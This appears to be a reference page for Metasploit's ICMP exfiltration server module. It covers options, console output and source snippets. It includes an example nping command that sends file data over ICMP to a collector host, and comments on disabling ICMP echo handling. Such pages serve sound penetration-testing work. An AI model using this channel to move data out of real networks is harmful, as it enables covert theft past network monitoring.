ICMP Exfiltration Service - Metasploit

This page contains detailed information about how to use the auxiliary/server/icmp_exfil metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview

---

Name: ICMP Exfiltration Service
Module: auxiliary/server/icmp_exfil
Source code: modules/auxiliary/server/icmp_exfil.rb
Disclosure date: -
Last modification time: 2017-10-31 04:53:14 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module is designed to provide a server-side component to receive and store files exfiltrated over ICMP echo request packets. To use this module you will need to send an initial ICMP echo request containing the specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or a random filename can be assigned). All data received from this source will automatically be added to the receive buffer until an ICMP echo request containing a specific end trigger (defaults to '^EOL') is received. Suggested Client: Data can be sent from the client using a variety of tools. One such example is nping (included with the NMAP suite of tools) - usage: nping --icmp 10.0.0.1 --data-string "BOFtest.txt" -c1

Module Ranking and Traits

---

Module Ranking:

• normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

---

msf > use auxiliary/server/icmp_exfil
msf auxiliary(icmp_exfil) > show targets
    ... a list of targets ...
msf auxiliary(icmp_exfil) > set TARGET target-id
msf auxiliary(icmp_exfil) > show options
    ... show and set options ...
msf auxiliary(icmp_exfil) > exploit

Go back to menu.

Msfconsole Usage

---

Here is how the server/icmp_exfil auxiliary module looks in the msfconsole:

msf6 > use auxiliary/server/icmp_exfil

msf6 auxiliary(server/icmp_exfil) > show info

       Name: ICMP Exfiltration Service
     Module: auxiliary/server/icmp_exfil
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Chris John Riley

Check supported:
  No

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  BPF_FILTER       icmp             yes       BFP format filter to listen for
  END_TRIGGER      ^EOF             yes       Trigger for end of file
  FNAME_IN_PACKET  true             yes       Filename presented in first packet straight after START_TRIGGER
  INTERFACE                         no        The name of the interface
  RESP_CONT        OK               yes       Data ro resond when continuation of data expected
  RESP_END         COMPLETE         yes       Data to response when EOF received and data saved
  RESP_START       SEND             yes       Data to respond when initial trigger matches
  START_TRIGGER    ^BOF             yes       Trigger for beginning of file

Description:
  This module is designed to provide a server-side component to 
  receive and store files exfiltrated over ICMP echo request packets. 
  To use this module you will need to send an initial ICMP echo 
  request containing the specific start trigger (defaults to '^BOF') 
  this can be followed by the filename being sent (or a random 
  filename can be assigned). All data received from this source will 
  automatically be added to the receive buffer until an ICMP echo 
  request containing a specific end trigger (defaults to '^EOL') is 
  received. Suggested Client: Data can be sent from the client using a 
  variety of tools. One such example is nping (included with the NMAP 
  suite of tools) - usage: nping --icmp 10.0.0.1 --data-string 
  "BOFtest.txt" -c1

References:
  https://github.com/todb/packetfu
  http://nmap.org/book/nping-man.html
  http://blog.c22.cc/2012/02/17/quick-post-fun-with-python-ctypes-simpleicmp/

Module Options

---

This is a complete list of options available in the server/icmp_exfil auxiliary module:

msf6 auxiliary(server/icmp_exfil) > show options

Module options (auxiliary/server/icmp_exfil):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   BPF_FILTER       icmp             yes       BFP format filter to listen for
   END_TRIGGER      ^EOF             yes       Trigger for end of file
   FNAME_IN_PACKET  true             yes       Filename presented in first packet straight after START_TRIGGER
   INTERFACE                         no        The name of the interface
   RESP_CONT        OK               yes       Data ro resond when continuation of data expected
   RESP_END         COMPLETE         yes       Data to response when EOF received and data saved
   RESP_START       SEND             yes       Data to respond when initial trigger matches
   START_TRIGGER    ^BOF             yes       Trigger for beginning of file

Advanced Options

---

Here is a complete list of advanced options supported by the server/icmp_exfil auxiliary module:

msf6 auxiliary(server/icmp_exfil) > show advanced

Module advanced options (auxiliary/server/icmp_exfil):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CLOAK      linux            yes       OS fingerprint to use for packet creation (Accepted: windows, linux, freebsd)
   LOCALIP                     no        The IP address of the local interface
   PROMISC    false            yes       Enable/Disable promiscuous mode
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Auxiliary Actions

---

This is a list of all auxiliary actions that the server/icmp_exfil module can do:

msf6 auxiliary(server/icmp_exfil) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options

---

Here is the full list of possible evasion options supported by the server/icmp_exfil auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(server/icmp_exfil) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

---

This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

WARNING : Pcaprub is not uptodate, some functionality will not be available

---

Here is a relevant code snippet related to the "WARNING : Pcaprub is not uptodate, some functionality will not be available" error message:

59:	
60:	  def run
61:	    begin
62:	      # check Pcaprub is up to date
63:	      if not netifaces_implemented?
64:	        print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available")
65:	        netifaces = false
66:	      else
67:	        netifaces = true
68:	      end
69:	

Dectected ICMP echo response. You must either disable ICMP handling

---

Here is a relevant code snippet related to the "Dectected ICMP echo response. You must either disable ICMP handling" error message:

120:	          # -(linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
121:	          # -(Windows) netsh firewall set icmpsetting 8 disable
122:	          # -(Windows) netsh firewall set opmode mode = ENABLE
123:	
124:	          if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip
125:	            print_error "Dectected ICMP echo response. You must either disable ICMP handling"
126:	            print_error "or try a more restrictive BPF filter. You might try:"
127:	            print_error " set BPF_FILTER icmp and not src #{datastore['LOCALIP']}"
128:	            return
129:	          end
130:	

or try a more restrictive BPF filter. You might try

---

Here is a relevant code snippet related to the "or try a more restrictive BPF filter. You might try" error message:

121:	          # -(Windows) netsh firewall set icmpsetting 8 disable
122:	          # -(Windows) netsh firewall set opmode mode = ENABLE
123:	
124:	          if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip
125:	            print_error "Dectected ICMP echo response. You must either disable ICMP handling"
126:	            print_error "or try a more restrictive BPF filter. You might try:"
127:	            print_error " set BPF_FILTER icmp and not src #{datastore['LOCALIP']}"
128:	            return
129:	          end
130:	
131:	          if @record

set BPF_FILTER icmp and not src <LOCALIP>

---

Here is a relevant code snippet related to the "set BPF_FILTER icmp and not src <LOCALIP>" error message:

122:	          # -(Windows) netsh firewall set opmode mode = ENABLE
123:	
124:	          if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip
125:	            print_error "Dectected ICMP echo response. You must either disable ICMP handling"
126:	            print_error "or try a more restrictive BPF filter. You might try:"
127:	            print_error " set BPF_FILTER icmp and not src #{datastore['LOCALIP']}"
128:	            return
129:	          end
130:	
131:	          if @record
132:	            print_error("New file started without saving old data")

New file started without saving old data

---

Here is a relevant code snippet related to the "New file started without saving old data" error message:

127:	            print_error " set BPF_FILTER icmp and not src #{datastore['LOCALIP']}"
128:	            return
129:	          end
130:	
131:	          if @record
132:	            print_error("New file started without saving old data")
133:	            store_file
134:	          end
135:	
136:	          # begin recording stream
137:	          @record = true

Go back to menu.

Related Pull Requests

---

• #9150 Merged Pull Request: Fix several broken raise RuntimeError calls in error paths
• #8888 Merged Pull Request: spelling/grammar fixes part 1
• #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
• #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
• #6655 Merged Pull Request: use MetasploitModule as a class name
• #6648 Merged Pull Request: Change metasploit class names
• #4317 Merged Pull Request: Proposed fix for #4305
• #4311 Merged Pull Request: Remove NETMASK option from Capture, fixing functionality on networks with a netmask other than /24
• #2819 Merged Pull Request: Don't use Pcap.lookupaddrs any more
• #2525 Merged Pull Request: Change module boilerplate
• #1078 Merged Pull Request: Icmp exfil

References

---

• CVE: Not available
• https://github.com/todb/packetfu
• http://nmap.org/book/nping-man.html
• http://blog.c22.cc/2012/02/17/quick-post-fun-with-python-ctypes-simpleicmp/

See Also

---

Check also the following modules related to this module:

• exploit/windows/fileformat/hhw_hhp_indexfile_bof
• auxiliary/server/android_browsable_msf_launch
• auxiliary/server/android_mercury_parseuri
• auxiliary/server/browser_autopwn
• auxiliary/server/browser_autopwn2
• auxiliary/server/dhclient_bash_env
• auxiliary/server/dhcp
• auxiliary/server/fakedns
• auxiliary/server/ftp
• auxiliary/server/http_ntlmrelay
• auxiliary/server/jsse_skiptls_mitm_proxy
• auxiliary/server/ldap
• auxiliary/server/local_hwbridge
• auxiliary/server/ms15_134_mcl_leak
• auxiliary/server/netbios_spoof_nat
• auxiliary/server/openssl_altchainsforgery_mitm_proxy
• auxiliary/server/openssl_heartbeat_client_memory
• auxiliary/server/pxeexploit
• auxiliary/server/regsvr32_command_delivery_server
• auxiliary/server/socks_proxy
• auxiliary/server/socks_unc
• auxiliary/server/teamviewer_uri_smb_redirect
• auxiliary/server/tftp
• auxiliary/server/webkit_xslt_dropper
• auxiliary/server/wget_symlink_file_write
• auxiliary/server/wpad

Authors

---

Chris John Riley

Version

---

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.